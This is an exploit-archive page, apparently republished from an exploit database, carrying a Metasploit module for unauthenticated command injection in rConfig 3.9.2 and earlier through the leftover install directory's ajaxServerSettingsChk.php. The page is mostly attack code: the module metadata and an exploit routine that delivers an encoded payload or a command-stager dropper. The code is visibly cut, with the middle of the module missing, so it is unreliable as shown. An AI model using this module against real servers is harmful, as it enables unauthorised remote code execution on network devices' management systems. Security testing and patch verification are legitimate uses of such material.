Exploits / Vulnerability Discovered : 2019-11-08 |
Type : remote |
Platform : linux
This exploit / vulnerability Rconfig install command execution (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'rConfig install Command Execution',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability
in rConfig versions 3.9.2 and prior. The `install` directory is not
automatically removed after installation, allowing unauthenticated users
to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
as the web server user.
def exploit
unless [CheckCode::Detected, CheckCode::Vulnerable].include? check
fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
end
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager(:linemax => 1_500)
end
end
end